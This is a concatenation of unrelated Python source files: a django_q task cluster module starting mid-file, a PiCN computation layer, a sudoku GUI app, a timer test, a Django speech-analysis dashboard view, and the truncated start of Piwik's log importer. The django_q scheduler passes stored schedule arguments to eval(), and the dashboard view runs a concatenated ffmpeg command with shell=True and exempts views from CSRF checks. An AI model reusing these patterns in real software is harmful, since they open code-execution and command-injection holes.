"STOP"): # save the result if task.get("cached", False): save_cached(task, broker) else: save_task(task, broker) # acknowledge result ack_id = task.pop("ack_id", False) if ack_id and (task["success"] or task.get("ack_failure", False)): broker.acknowledge(ack_id) # log the result if task["success"]: # log success logger.info(_(f"Processed [{task['name']}]")) else: # log failure logger.error(_(f"Failed [{task['name']}] - {task['result']}")) logger.info(_(f"{name} stopped monitoring results")) def worker( task_queue: Queue, result_queue: Queue, timer: Value, timeout: int = Conf.TIMEOUT ): """ Takes a task from the task queue, tries to execute it and puts the result back in the result queue :param timeout: number of seconds wait for a worker to finish. :type task_queue: multiprocessing.Queue :type result_queue: multiprocessing.Queue :type timer: multiprocessing.Value """ name = current_process().name logger.info(_(f"{name} ready for work at {current_process().pid}")) task_count = 0 if timeout is None: timeout = -1 # Start reading the task queue for task in iter(task_queue.get, "STOP"): result = None timer.value = -1 # Idle task_count += 1 # Get the function from the task logger.info(_(f'{name} processing [{task["name"]}]')) f = task["func"] # if it's not an instance try to get it from the string if not callable(task["func"]): try: module, func = f.rsplit(".", 1) m = importlib.import_module(module) f = getattr(m, func) except (ValueError, ImportError, AttributeError) as e: result = (e, False) if error_reporter: error_reporter.report() # We're still going if not result: close_old_django_connections() timer_value = task.pop("timeout", timeout) # signal execution pre_execute.send(sender="django_q", func=f, task=task) # execute the payload timer.value = timer_value # Busy try: res = f(*task["args"], **task["kwargs"]) result = (res, True) except Exception as e: result = (f"{e} : {traceback.format_exc()}", False) if error_reporter: error_reporter.report() if task.get("sync", False): raise with timer.get_lock(): # Process result task["result"] = result[0] task["success"] = result[1] task["stopped"] = timezone.now() result_queue.put(task) timer.value = -1 # Idle # Recycle if task_count == Conf.RECYCLE or rss_check(): timer.value = -2 # Recycled break logger.info(_(f"{name} stopped doing work")) def save_task(task, broker: Broker): """ Saves the task package to Django or the cache :param task: the task package :type broker: brokers.Broker """ # SAVE LIMIT < 0 : Don't save success if not task.get("save", Conf.SAVE_LIMIT >= 0) and task["success"]: return # enqueues next in a chain if task.get("chain", None): django_q.tasks.async_chain( task["chain"], group=task["group"], cached=task["cached"], sync=task["sync"], broker=broker, ) # SAVE LIMIT > 0: Prune database, SAVE_LIMIT 0: No pruning close_old_django_connections() try: if task["success"] and 0 < Conf.SAVE_LIMIT <= Success.objects.count(): Success.objects.last().delete() # check if this task has previous results if Task.objects.filter(id=task["id"], name=task["name"]).exists(): existing_task = Task.objects.get(id=task["id"], name=task["name"]) # only update the result if it hasn't succeeded yet if not existing_task.success: existing_task.stopped = task["stopped"] existing_task.result = task["result"] existing_task.success = task["success"] existing_task.attempt_count = existing_task.attempt_count + 1 existing_task.save() if Conf.MAX_ATTEMPTS > 0 and existing_task.attempt_count >= Conf.MAX_ATTEMPTS: broker.acknowledge(task['ack_id']) else: Task.objects.create( id=task["id"], name=task["name"], func=task["func"], hook=task.get("hook"), args=task["args"], kwargs=task["kwargs"], started=task["started"], stopped=task["stopped"], result=task["result"], group=task.get("group"), success=task["success"], attempt_count=1 ) except Exception as e: logger.error(e) def save_cached(task, broker: Broker): task_key = f'{broker.list_key}:{task["id"]}' timeout = task["cached"] if timeout is True: timeout = None try: group = task.get("group", None) iter_count = task.get("iter_count", 0) # if it's a group append to the group list if group: group_key = f"{broker.list_key}:{group}:keys" group_list = broker.cache.get(group_key) or [] # if it's an iter group, check if we are ready if iter_count and len(group_list) == iter_count - 1: group_args = f"{broker.list_key}:{group}:args" # collate the results into a Task result results = [ SignedPackage.loads(broker.cache.get(k))["result"] for k in group_list ] results.append(task["result"]) task["result"] = results task["id"] = group task["args"] = SignedPackage.loads(broker.cache.get(group_args)) task.pop("iter_count", None) task.pop("group", None) if task.get("iter_cached", None): task["cached"] = task.pop("iter_cached", None) save_cached(task, broker=broker) else: save_task(task, broker) broker.cache.delete_many(group_list) broker.cache.delete_many([group_key, group_args]) return # save the group list group_list.append(task_key) broker.cache.set(group_key, group_list, timeout) # async_task next in a chain if task.get("chain", None): django_q.tasks.async_chain( task["chain"], group=group, cached=task["cached"], sync=task["sync"], broker=broker, ) # save the task broker.cache.set(task_key, SignedPackage.dumps(task), timeout) except Exception as e: logger.error(e) def scheduler(broker: Broker = None): """ Creates a task from a schedule at the scheduled time and schedules next run """ if not broker: broker = get_broker() close_old_django_connections() try: with db.transaction.atomic(using=Schedule.objects.db): for s in ( Schedule.objects.select_for_update() .exclude(repeats=0) .filter(next_run__lt=timezone.now()) ): args = () kwargs = {} # get args, kwargs and hook if s.kwargs: try: # eval should be safe here because dict() kwargs = eval(f"dict({s.kwargs})") except SyntaxError: kwargs = {} if s.args: args = ast.literal_eval(s.args) # single value won't eval to tuple, so: if type(args) != tuple: args = (args,) q_options = kwargs.get("q_options", {}) if s.hook: q_options["hook"] = s.hook # set up the next run time if not s.schedule_type == s.ONCE: next_run = arrow.get(s.next_run) while True: if s.schedule_type == s.MINUTES: next_run = next_run.shift(minutes=+(s.minutes or 1)) elif s.schedule_type == s.HOURLY: next_run = next_run.shift(hours=+1) elif s.schedule_type == s.DAILY: next_run = next_run.shift(days=+1) elif s.schedule_type == s.WEEKLY: next_run = next_run.shift(weeks=+1) elif s.schedule_type == s.MONTHLY: next_run = next_run.shift(months=+1) elif s.schedule_type == s.QUARTERLY: next_run = next_run.shift(months=+3) elif s.schedule_type == s.YEARLY: next_run = next_run.shift(years=+1) elif s.schedule_type == s.CRON: if not croniter: raise ImportError( _( "Please install croniter to enable cron expressions" ) ) next_run = arrow.get( croniter(s.cron, timezone.now()).get_next() ) if Conf.CATCH_UP or next_run > arrow.utcnow(): break # arrow always returns a tz aware datetime, and we don't want # this when we explicitly configured django with USE_TZ=False s.next_run = ( next_run.datetime if settings.USE_TZ else next_run.datetime.replace(tzinfo=None) ) s.repeats += -1 # send it to the cluster q_options["broker"] = broker q_options["group"] = q_options.get("group", s.name or s.id) kwargs["q_options"] = q_options s.task = django_q.tasks.async_task(s.func, *args, **kwargs) # log it if not s.task: logger.error( _( f"{current_process().name} failed to create a task from schedule [{s.name or s.id}]" ) ) else: logger.info( _( f"{current_process().name} created a task from schedule [{s.name or s.id}]" ) ) # default behavior is to delete a ONCE schedule if s.schedule_type == s.ONCE: if s.repeats < 0: s.delete() continue # but not if it has a positive repeats s.repeats = 0 # save the schedule s.save() except Exception as e: logger.error(e) def close_old_django_connections(): """ Close django connections unless running with sync=True. """ if Conf.SYNC: logger.warning( "Preserving django database connections because sync=True. Beware " "that tasks are now injected in the calling context/transactions " "which may result in unexpected bahaviour." ) else: db.close_old_connections() def set_cpu_affinity(n: int, process_ids: list, actual: bool = not Conf.TESTING): """ Sets the cpu affinity for the supplied processes. Requires the optional psutil module. :param int n: affinity :param list process_ids: a list of pids :param bool actual: Test workaround for Travis not supporting cpu affinity """ # check if we have the psutil module if not psutil: logger.warning("Skipping cpu affinity because psutil was not found.") return # check if the platform supports cpu_affinity if actual and not hasattr(psutil.Process(process_ids[0]), "cpu_affinity"): logger.warning( "Faking cpu affinity because it is not supported on this platform" ) actual = False # get the available processors cpu_list = list(range(psutil.cpu_count())) # affinities of 0 or gte cpu_count, equals to no affinity if not n or n >= len(cpu_list): return # spread the workers over the available processors. index = 0 for pid in process_ids: affinity = [] for k in range(n): if index == len(cpu_list): index = 0 affinity.append(cpu_list[index]) index += 1 if psutil.pid_exists(pid): p = psutil.Process(pid) if actual: p.cpu_affinity(affinity) logger.info(_(f"{pid} will use cpu {affinity}")) def rss_check(): if Conf.MAX_RSS and resource: return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss >= Conf.MAX_RSS elif Conf.MAX_RSS and psutil: return psutil.Process().memory_info().rss >= Conf.MAX_RSS * 1024 return False
PinnedComputationLayer.py
import multiprocessing import threading import time from math import pow from PiCN.Processes import LayerProcess from PiCN.Packets import Name, Interest, Content, Nack, NackReason class PinnedComputationLayer(LayerProcess): def __init__(self, replica_id, log_level=255): super().__init__(logger_name="PinnedNFNLayer (" + str(replica_id) + ")", log_level=log_level) self.storage = None def data_from_higher(self, to_lower: multiprocessing.Queue, to_higher: multiprocessing.Queue, data): pass # this is already the highest layer. def data_from_lower(self, to_lower: multiprocessing.Queue, to_higher: multiprocessing.Queue, data): self.logger.info("Received packet") packet_id = data[0] packet = data[1] if isinstance(packet, Interest): self.logger.info("Received packet is an interest") self.handleInterest(packet_id, packet) else: self.logger.info("Received packet is not an interest") return def return_result(self, packet_id, content: Content): self.queue_to_lower.put([packet_id, content]) def return_nack(self, packet_id, interest: Interest): self.queue_to_lower.put([packet_id, Nack(interest.name, reason=NackReason.NOT_SET, interest=interest)]) # TODO -- choose an appropriate NACK reason def handleInterest(self, packet_id: int, interest: Interest): components = interest.name.components if components[-1] == b"pNFN": try: num_params = int(components[-2]) self.params = components[-num_params - 2:-2] self.params = list(map(lambda x: x.decode('utf-8'), self.params)) assert (num_params < len(interest.name.components) - 2) self.function_name = components[:-num_params - 2] self.function_name = "/" + "/".join(list(map(lambda x: x.decode('utf-8'), self.function_name))) except: self.return_nack(packet_id, interest) self.logger.info("Invalid computation expression. Return NACK.") return if self.function_name == "/the/prefix/square": self.return_result(packet_id, Content(interest.name, "5")) # QUESTION -- return as string? self.logger.info("Result returned") arguments = [self.pinned_function_square, self.params, interest.name] t = threading.Thread(target=self.executePinnedFunction, args=arguments) t.setDaemon(True) t.start() return else: self.return_nack(packet_id, interest) self.logger.info("Pinned function not available. Return NACK.") return else: self.logger.info("Received interest does not contain a computation expression") return ### defining some pinned functions def executePinnedFunction(self, function, params, interest_name: Name): result = function(params) new_components = interest_name.to_string().split("/")[1:-1] new_components.append("resultpNFN") new_name = "/" + '/'.join(new_components) content_object = Content(new_name, str(result)) self.queue_to_lower.put([-1, content_object]) def pinned_function_square(self, params): # TODO -- check if params contains valid parameters time.sleep(5) return int(pow(int(params[0]), 2)) def ageing(self): pass # ageing not necessary
app.py
from os import makedirs, path as osPath from numpy import loadtxt, savetxt import threading from .given import given from .sudoku import Sudoku from .settings import DIGIT_NUMBER, GOAL, OpenButtonOption, RenderOption, SolveButtonOption, WriteButtonOption from .ui import Ui class App: def __init__(self): self.puzzle = None self.puzzlePath = None self.sudoku = None self.solveThread = None self.opening = False self.writing = False self.solving = False self.keyWaiting = False self.currentRowColumn = None self.ui = Ui() self.ui.openCmd = self.open self.ui.writeCmd = self.write self.ui.clearCmd = self.clear self.ui.solveCmd = self.solve self.ui.clickCmd = self.click self.ui.pressCmd = self.press self.ui.loadCommamd() def load(self, path): # Load a configuration to solve. with open(path, "r") as f: values = loadtxt(f).reshape((DIGIT_NUMBER, DIGIT_NUMBER)).astype(int) given.loadValues(values) self.sudoku = Sudoku(self.render) self.solveThread = threading.Thread(target=self.sudoku.solve) self.ui.drawGivenBoard() return def save(self, path, solution): # Save a configuration to a file. dirPath = osPath.dirname(osPath.abspath(path)) makedirs(dirPath, exist_ok=True) with open(path, "w") as f: savetxt(f, solution.reshape(DIGIT_NUMBER, DIGIT_NUMBER), fmt='%d') return def render(self, text, option=RenderOption.NORMAL): self.ui.showStatistic(text) if option != RenderOption.ONLY_TEXT: self.ui.statistic["text"] = text self.ui.drawRemainBoard(given.bestCandidate.gene) given.updateDuplicateValues() if given.bestCandidate.fitness == GOAL: self.ui.drawSolutionBg() else: self.ui.drawDuplicateBg() if option in [RenderOption.FOUNDED,RenderOption.NOT_FOUND]: self.solveThread = threading.Thread(target=self.sudoku.solve) self.ui.solveButtonSwitch(SolveButtonOption.READY) self.solving = False if option == RenderOption.FOUNDED: self.save("./solutions/" + self.puzzle, given.bestCandidate.gene) self.ui.window.update() def solve(self): if not self.solving: if self.solveThread.is_alive(): return self.solveThread.start() self.solving = True self.ui.solveButtonSwitch(SolveButtonOption.SOLVE) else: if not self.solveThread.is_alive(): return self.ui.solveButtonSwitch(SolveButtonOption.CANCEL) self.sudoku.exitFlag = True self.solveThread.join() self.solveThread = threading.Thread(target=self.sudoku.solve) self.solving = False self.ui.solveButtonSwitch(SolveButtonOption.READY) def clear(self): self.ui.showStatistic("") self.ui.drawRemainBoard(given.values) given.resetBestCandidate() given.updateDuplicateValues() self.ui.drawDuplicateBg() def open(self): if not self.opening: puzzlePath = self.ui.getPuzzleDialog() try: self.puzzle = osPath.basename(puzzlePath) self.load(puzzlePath) except: return self.ui.openButtonSwitch(OpenButtonOption.OPEN) self.opening = True else: given.resetBestCandidate() given.updateDuplicateValues() given.loadValues(given.zeroCandidate.gene) self.sudoku = None self.solveThread = None self.ui.drawRemainBoard(given.values) self.ui.drawGivenBoard() self.ui.drawDuplicateBg() self.ui.openButtonSwitch(OpenButtonOption.CLOSE) self.opening = False def write(self): if not self.writing: self.ui.writeButtonSwitch(WriteButtonOption.WRITE) given.resetBestCandidate(True) self.writing = True else: try: saveFile = self.ui.savePuzzleDialog() savetxt(saveFile, given.bestCandidate.gene.reshape(DIGIT_NUMBER, DIGIT_NUMBER), fmt='%d') saveFile.close() except: return self.clear() self.ui.writeButtonSwitch(WriteButtonOption.SAVE) self.writing = False def click(self, event): if self.solving: return if self.keyWaiting: self.keyWaiting = False row, col = self.currentRowColumn self.ui.drawItem(row,col,"") return else: if self.opening or self.writing: row, col = self.ui.clickToLogicalPosition(event.x, event.y) if given.values[row][col] != 0: return self.ui.drawItem(row,col,"X") self.currentRowColumn = (row, col) else: return self.keyWaiting = True def press(self, event): if not self.keyWaiting: return row, col = self.currentRowColumn if event.char in list(map(chr,range(ord("1"),ord("9")+1))): given.bestCandidate.gene[row,col] = int(event.char) self.ui.drawRemainBoard(given.bestCandidate.gene) given.updateDuplicateValues() self.ui.drawDuplicateBg() else: self.ui.drawItem(row,col,"") self.keyWaiting = False def run(self, puzzle = None): self.ui.mainloop()
test2.py
import utility import threading import time threading.Thread(target=utility.startTimer).start() time.sleep(2) print utility.getTime() time.sleep(1) print utility.getTime() utility.startTimer() time.sleep(1) print utility.getTime() time.sleep(1) print utility.getTime()
views_dashboard.py
from django.shortcuts import render from django.http import HttpResponseRedirect, JsonResponse from django.contrib.auth import authenticate, login, logout from django.contrib.auth.models import User from speakInOut.helper import parse_session, authentication_check, register_user from .forms import LoginForm, AccountRegisterForm from .models import Speech from django.views.decorators.csrf import csrf_exempt from django.http import HttpResponse from django.core.files.storage import default_storage from django.core.files.base import ContentFile import threading import subprocess import json import os from textCompare import * from eyeTrack import track from fillerWordAnalyzer import analyze_text @csrf_exempt def dashboard_view(request): # Authentication check. Users currently logged in cannot view this page. authentication_result = authentication_check(request) if authentication_result is not None: return authentication_result template_data = parse_session(request) # get template data from session template_data['profile'] = User.objects.get(username=request.user) template_data['dashboard'] = True if request.method == "POST": vd = request.FILES.get("audiovideo", None) name = request.POST.get("name") print(type(vd)) path = default_storage.save('video/' + '123' + '.mp4', ContentFile(vd.read())) request.session['video_name'] = name # task = ThreadTask() # task.save() t = threading.Thread(target=longTask,args=[path,request,name]) t.setDaemon(True) t.start() return HttpResponse(status=200) return render(request, 'dashboard.html', template_data) # def startThreadTask(request): # task = ThreadTask() # task.save() # t = threading.Thread(target=longTask,args=[task.id]) # t.setDaemon(True) # t.start() # return JsonResponse({'id':task.id}) # # Check status of long tash # def checkThreadTask(request,id): # task = ThreadTask.objects.get(pk=id) # return JsonResponse({'is_done':task.is_done}) def longTask(video_path, request,name): print("Analyzing ",video_path) conf = track.analyzeFrames(video_path) print("Generating audio file") audio_file_name = os.path.basename(video_path).split('.')[0] + '.wav' command = "ffmpeg -i " + video_path + " -ab 160k -ac 2 -ar 44100 -vn audio/" + audio_file_name subprocess.call(command, shell=True) #Generating text from audio. audio_path = "audio/" + audio_file_name text_from_audio = audioTranscript(audio_path) print(text_from_audio) #Generating questions from text. questions = generateQuestionsFromText(text_from_audio) print(questions) final_quest = "" for i in range(8): if i< len(questions): final_quest += questions[i]+"," print("Final questions is" + final_quest) #Analysing filler words filler_percent = analyze_text.filler_percentage(text_from_audio) print(filler_percent) user_obj = User.objects.get(username=request.user) speech_obj = Speech() speech_obj.name = name speech_obj.user = user_obj speech_obj.video = video_path speech_obj.audio = audio_path speech_obj.filler_per = filler_percent speech_obj.gaze_count = conf speech_obj.generated_questions = final_quest speech_obj.speech2text = text_from_audio speech_obj.save() # task = ThreadTask.objects.get(pk=id) # task.is_done = True # task.save() # print("Finished task",id) def show_analysis(request): authentication_result = authentication_check(request) if authentication_result is not None: return authentication_result template_data = parse_session(request) # get template data from session template_data['profile'] = User.objects.get(username=request.user) template_data['dashboard'] = True name = template_data['video_name'] obj = Speech.objects.get(name = name, user = request.user) print("Printing") print(obj) template_data['obj'] = obj template_data['obj'].generated_questions_string = obj.generated_questions.split(",") print(template_data['obj'].name) return render(request, 'dashboard.html', template_data) @csrf_exempt def upload_manuscript(request): authentication_result = authentication_check(request) if authentication_result is not None: return authentication_result template_data = parse_session(request) video_name = template_data['video_name'] if request.method == 'POST': speech_obj = Speech.objects.get(name=video_name) speech_obj.manuscript = request.POST.get('manuscript_text') speech_obj.text_sim = compareTranscripts(speech_obj.speech2text,speech_obj.manuscript)*100 speech_obj.save() return HttpResponse(status=200) def myvideos(request): authentication_result = authentication_check(request) if authentication_result is not None: return authentication_result template_data = parse_session(request) template_data['myvideos'] = True all_speeches = Speech.objects.filter(user=request.user) template_data['videos'] = all_speeches return render(request, 'myvideos.html', template_data)
import_logs.py
#!/usr/bin/python # vim: et sw=4 ts=4: # -*- coding: utf-8 -*- # # Piwik - free/libre analytics platform # # @link http://piwik.org # @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later # @version $Id$ # # For more info see: http://piwik.org/log-analytics/ and http://piwik.org/docs/log-analytics-tool-how-to/ # # Requires Python 2.6 or greater. # import base64 import bz2 import ConfigParser import datetime import fnmatch import gzip import hashlib import httplib import inspect import itertools import logging import optparse import os import os.path import Queue import re import sys import threading import time import urllib import urllib2 import urlparse import subprocess import functools import traceback import socket import textwrap try: import json except ImportError: try: import simplejson as json except ImportError: if sys.version_info < (2, 6): print >> sys.stderr, 'simplejson (http://pypi.python.org/pypi/simplejson/) is required.' sys.exit(1) ## ## Constants. ## STATIC_EXTENSIONS = set(( 'gif jpg jpeg png bmp ico svg svgz ttf otf eot woff class swf css js xml robots.txt webp' ).split()) DOWNLOAD_EXTENSIONS = set(( '7z aac arc arj asf asx avi bin csv deb dmg doc docx exe flv gz gzip hqx ' 'ibooks jar mpg mp2 mp3 mp4 mpeg mov movie msi msp odb odf odg odp ' 'ods odt ogg ogv pdf phps ppt pptx qt qtm ra ram rar rpm sea sit tar tbz ' 'bz2 tbz tgz torrent txt wav wma wmv wpd xls xlsx xml xsd z zip ' 'azw3 epub mobi apk' ).split()) # A good source is: http://phpbb-bots.blogspot.com/ EXCLUDED_USER_AGENTS = ( 'adsbot-google', 'ask jeeves', 'baidubot', 'bot-', 'bot/', 'ccooter/', 'crawl', 'curl', 'echoping', 'exabot', 'feed', 'googlebot', 'ia_archiver', 'java/', 'libwww', 'mediapartners-google', 'msnbot', 'netcraftsurvey', 'panopta', 'robot', 'spider', 'surveybot', 'twiceler', 'voilabot', 'yahoo', 'yandex', ) PIWIK_DEFAULT_MAX_ATTEMPTS = 3 PIWIK_DEFAULT_DELAY_AFTER_FAILURE = 10 DEFAULT_SOCKET_TIMEOUT = 300 PIWIK_EXPECTED_IMAGE = base64.b64decode( 'R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==' ) ## ## Formats. ## class BaseFormatException(Exception): pass class BaseFormat(object): def __init__(self, name): self.name = name self.regex = None self.date_format = '%d/%b/%Y:%H:%M:%S' def check_format(self, file): line = file.readline() file.seek(0) return self.check_format_line(line) def check_format_line(self, line): return False class JsonFormat(BaseFormat): def __init__(self, name): super(JsonFormat, self).__init__(name) self.json = None self.date_format = '%Y-%m-%dT%H:%M:%S' def check_format_line(self, line): try: self.json = json.loads(line) return True except: return False def match(self, line): try: self.json = json.loads(line) return self except: self.json = None return None def get(self, key): # Some ugly patchs ... if key == 'generation_time_milli': self.json[key] = int(self.json[key] * 1000) # Patch date format ISO 8601 elif key == 'date': tz = self.json[key][19:] self.json['timezone'] = tz.replace(':', '') self.json[key] = self.json[key][:19] try: return self.json[key] except KeyError: raise BaseFormatException() def get_all(self,): return self.json def remove_ignored_groups(self, groups): for group in groups: del self.json[group] class RegexFormat(BaseFormat): def __init__(self, name, regex, date_format=None): super(RegexFormat, self).__init__(name) if regex is not None: self.regex = re.compile(regex) if date_format is not None: self.date_format = date_format self.matched = None def check_format_line(self, line): return self.match(line) def match(self,line): if not self.regex: return None match_result = self.regex.match(line) if match_result: self.matched = match_result.groupdict() else: self.matched = None return match_result def get(self, key): try: return self.matched[key] except KeyError: raise BaseFormatException("Cannot find group '%s'." % key) def get_all(self,): return self.matched def remove_ignored_groups(self, groups): for group in groups: del self.matched[group] class W3cExtendedFormat(RegexFormat): FIELDS_LINE_PREFIX = '#Fields: ' fields = { 'date': '(?P<date>^\d+[-\d+]+', 'time': '[\d+:]+)[.\d]*?', # TODO should not assume date & time will be together not sure how to fix ATM. 'cs-uri-stem': '(?P<path>/\S*)', 'cs-uri-query': '(?P<query_string>\S*)', 'c-ip': '"?(?P<ip>[\d*.-]*)"?', 'cs(User-Agent)': '(?P<user_agent>".*?"|\S+)', 'cs(Referer)': '(?P<referrer>\S+)', 'sc-status': '(?P<status>\d+)', 'sc-bytes': '(?P<length>\S+)', 'cs-host': '(?P<host>\S+)', 'cs-username': '(?P<userid>\S+)', 'time-taken': '(?P<generation_time_secs>[.\d]+)' } def __init__(self): super(W3cExtendedFormat, self).__init__('w3c_extended', None, '%Y-%m-%d %H:%M:%S') def check_format(self, file): self.create_regex(file) # if we couldn't create a regex, this file does not follow the W3C extended log file format if not self.regex: file.seek(0) return first_line = file.readline() file.seek(0) return self.check_format_line(first_line) def create_regex(self, file): fields_line = None if config.options.w3c_fields: fields_line = config.options.w3c_fields # collect all header lines up until the Fields: line # if we're reading from stdin, we can't seek, so don't read any more than the Fields line header_lines = [] while fields_line is None: line = file.readline().strip() if not line: continue if not line.startswith('#'): break if line.startswith(W3cExtendedFormat.FIELDS_LINE_PREFIX): fields_line = line else: header_lines.append(line) if not fields_line: return # store the header lines for a later check for IIS self.header_lines = header_lines # Parse the 'Fields: ' line to create the regex to use full_regex = [] expected_fields = type(self).fields.copy() # turn custom field mapping into field => regex mapping # if the --w3c-time-taken-millisecs option is used, make sure the time-taken field is interpreted as milliseconds if config.options.w3c_time_taken_in_millisecs: expected_fields['time-taken'] = '(?P<generation_time_milli>[\d.]+)' for mapped_field_name, field_name in config.options.custom_w3c_fields.iteritems(): expected_fields[mapped_field_name] = expected_fields[field_name] del expected_fields[field_name] # add custom field regexes supplied through --w3c-field-regex option for field_name, field_regex in config.options.w3c_field_regexes.iteritems(): expected_fields[field_name] = field_regex # Skip the 'Fields: ' prefix. fields_line = fields_line[9:].strip() for field in re.split('\s+', fields_line): try: regex = expected_fields[field] except KeyError: regex = '(?:".*?"|\S+)' full_regex.append(regex) full_regex = '\s+'.join(full_regex) logging.debug("Based on 'Fields:' line, computed regex to be %s", full_regex) self.regex = re.compile(full_regex) def check_for_iis_option(self): if not config.options.w3c_time_taken_in_millisecs and self._is_time_taken_milli() and self._is_iis(): logging.info("WARNING: IIS log file being parsed without --w3c-time-taken-milli option. IIS" " stores millisecond values in the time-taken field. If your logfile does this, the aforementioned" " option must be used in order to get accurate generation times.") def _is_iis(self): return len([line for line in self.header_lines if 'internet information services' in line.lower() or 'iis' in line.lower()]) > 0 def _is_time_taken_milli(self): return 'generation_time_milli' not in self.regex.pattern class IisFormat(W3cExtendedFormat): fields = W3cExtendedFormat.fields.copy() fields.update({ 'time-taken': '(?P<generation_time_milli>[.\d]+)', 'sc-win32-status': '(?P<__win32_status>\S+)' # this group is useless for log importing, but capturing it # will ensure we always select IIS for the format instead of # W3C logs when detecting the format. This way there will be # less accidental importing of IIS logs w/o --w3c-time-taken-milli. }) def __init__(self): super(IisFormat, self).__init__() self.name = 'iis' class AmazonCloudFrontFormat(W3cExtendedFormat): fields = W3cExtendedFormat.fields.copy() fields.update({ 'x-event': '(?P<event_action>\S+)', 'x-sname': '(?P<event_name>\S+)', 'cs-uri-stem': '(?:rtmp:/)?(?P<path>/\S*)', 'c-user-agent': '(?P<user_agent>".*?"|\S+)', # following are present to match cloudfront instead of W3C when we know it's cloudfront 'x-edge-location': '(?P<x_edge_location>".*?"|\S+)', 'x-edge-result-type': '(?P<x_edge_result_type>".*?"|\S+)', 'x-edge-request-id': '(?P<x_edge_request_id>".*?"|\S+)', 'x-host-header': '(?P<x_host_header>".*?"|\S+)' }) def __init__(self): super(AmazonCloudFrontFormat, self).__init__() self.name = 'amazon_cloudfront' def get(self, key): if key == 'event_category' and 'event_category' not in self.matched: return 'cloudfront_rtmp' elif key == 'status' and 'status' not in self.matched: return '200' elif key == 'user_agent': user_agent = super(AmazonCloudFrontFormat, self).get(key) return urllib2.unquote(user_agent) else: return super(AmazonCloudFrontFormat, self).get(key) _HOST_PREFIX = '(?P<host>[\w\-\.]*)(?::\d+)?\s+' _COMMON_LOG_FORMAT = ( '(?P<ip>\S+)\s+\S+\s+\S+\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+' '"\S+\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\S+)\s+(?P<length>\S+)' ) _NCSA_EXTENDED_LOG_FORMAT = (_COMMON_LOG_FORMAT + '\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"' ) _S3_LOG_FORMAT = ( '\S+\s+(?P<host>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+(?P<ip>\S+)\s+' '\S+\s+\S+\s+\S+\s+\S+\s+"\S+\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\S+)\s+\S+\s+(?P<length>\S+)\s+' '\S+\s+\S+\s+\S+\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"' ) _ICECAST2_LOG_FORMAT = ( _NCSA_EXTENDED_LOG_FORMAT + '\s+(?P<session_time>\S+)' ) FORMATS = { 'common': RegexFormat('common', _COMMON_LOG_FORMAT), 'common_vhost': RegexFormat('common_vhost', _HOST_PREFIX + _COMMON_LOG_FORMAT), 'ncsa_extended': RegexFormat('ncsa_extended', _NCSA_EXTENDED_LOG_FORMAT), 'common_complete': RegexFormat('common_complete', _HOST_PREFIX + _NCSA_EXTENDED_LOG_FORMAT), 'w3c_extended': W3cExtendedFormat(), 'amazon_cloudfront': AmazonCloudFrontFormat(), 'iis': IisFormat(), 's3': RegexFormat('s3', _S3_LOG_FORMAT), 'icecast2': RegexFormat('icecast2', _ICECAST2_LOG_FORMAT), 'nginx_json': JsonFormat('nginx_json'), } ## ## Code. ## class Configuration(object): """ Stores all the configuration options by reading sys.argv and parsing, if needed, the config.inc.php. It has 2 attributes: options and filenames. """ class Error(Exception): pass def _create_parser(self): """ Initialize and return the OptionParser instance. """ option_parser = optparse.OptionParser( usage='Usage: %prog [options] log_file [ log_file [...] ]', description="Import HTTP access logs to Piwik. " "log_file is the path to a server access log file (uncompressed, .gz, .bz2, or specify - to read from stdin). " " By default, the script will try to produce clean reports and will exclude bots, static files, discard http error and redirects, etc. This is customizable, see below.", epilog="About Piwik Server Log Analytics: http://piwik.org/log-analytics/ " " Found a bug? Please create a ticket in http://dev.piwik.org/ " " Please send your suggestions or successful user story to hello@piwik.org " ) option_parser.add_option( '--debug', '-d', dest='debug', action='count', default=0, help="Enable debug output (specify multiple times for more verbose)", ) option_parser.add_option( '--debug-tracker', dest='debug_tracker', action='store_true', default=False, help="Appends &debug=1 to tracker requests and prints out the result so the tracker can be debugged. If " "using the log importer results in errors with the tracker or improperly recorded visits, this option can " "be used to find out what the tracker is doing wrong. To see debug tracker output, you must also set the " "[Tracker] debug_on_demand INI config to 1 in your Piwik's config.ini.php file." ) option_parser.add_option( '--debug-request-limit', dest='debug_request_limit', type='int', default=None, help="Debug option that will exit after N requests are parsed. Can be used w/ --debug-tracker to limit the " "output of a large log file." ) option_parser.add_option( '--url', dest='piwik_url', help="REQUIRED Your Piwik server URL, eg. http://example.com/piwik/ or http://analytics.example.net", ) option_parser.add_option( '--dry-run', dest='dry_run', action='store_true', default=False, help="Perform a trial run with no tracking data being inserted into Piwik", ) option_parser.add_option( '--show-progress', dest='show_progress', action='store_true', default=os.isatty(sys.stdout.fileno()), help="Print a progress report X seconds (default: 1, use --show-progress-delay to override)" ) option_parser.add_option( '--show-progress-delay', dest='show_progress_delay', type='int', default=1, help="Change the default progress delay" ) option_parser.add_option( '--add-sites-new-hosts', dest='add_sites_new_hosts', action='store_true', default=False, help="When a hostname is found in the log file, but not matched to any website " "in Piwik, automatically create a new website in Piwik with this hostname to " "import the logs" ) option_parser.add_option( '--idsite', dest='site_id', help= ("When specified, " "data in the specified log files will be tracked for this Piwik site ID." " The script will not auto-detect the website based on the log line hostname (new websites will not be automatically created).") ) option_parser.add_option( '--idsite-fallback', dest='site_id_fallback', help="Default Piwik site ID to use if the hostname doesn't match any " "known Website's URL. New websites will not be automatically created. " " Used only if --add-sites-new-hosts or --idsite are not set", ) default_config = os.path.abspath( os.path.join(os.path.dirname(__file__), '../../config/config.ini.php'), ) option_parser.add_option( '--config', dest='config_file', default=default_config, help=( "This is only used when --login and --password is not used. " "Piwik will read the configuration file (default: %default) to " "fetch the Super User token_auth from the config file. " ) ) option_parser.add_option( '--login', dest='login', help="You can manually specify the Piwik Super User login" ) option_parser.add_option( '--password', dest='password', help="You can manually specify the Piwik Super User password" ) option_parser.add_option( '--token-auth', dest='piwik_token_auth', help="Piwik Super User token_auth, 32 characters hexadecimal string, found in Piwik > API", ) option_parser.add_option( '--hostname', dest='hostnames', action='append', default=[], help="Accepted hostname (requests with other hostnames will be 